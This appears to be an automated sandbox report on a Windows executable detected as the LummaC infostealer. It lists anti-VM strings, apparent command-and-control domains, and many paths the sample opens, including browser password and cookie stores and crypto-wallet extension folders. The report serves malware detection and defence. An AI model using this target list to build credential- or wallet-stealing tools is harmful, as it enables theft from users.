Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

API call chain: ExitProcess graph end node

graph_0-26258

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_0043A9B0 LdrInitializeThunk,

0_2_0043A9B0

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B092B mov eax, dword ptr fs:[00000030h]	0_2_009B092B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B0D90 mov eax, dword ptr fs:[00000030h]	0_2_009B0D90
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00BCAEB3 push dword ptr fs:[00000030h]	0_2_00BCAEB3

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: H1iOI9vWfh.exe	String found in binary or memory: hummskitnj.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: cashfuzysao.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: appliacnesot.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: screwamusresz.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: inherineau.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: scentniej.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: rebuildeso.buzz
Source: H1iOI9vWfh.exe	String found in binary or memory: prisonyfork.buzz

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 0.2.H1iOI9vWfh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.H1iOI9vWfh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.H1iOI9vWfh.exe.b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.H1iOI9vWfh.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: H1iOI9vWfh.exe PID: 7024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3P
Source: H1iOI9vWfh.exe, 00000000.00000003.2456393274.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
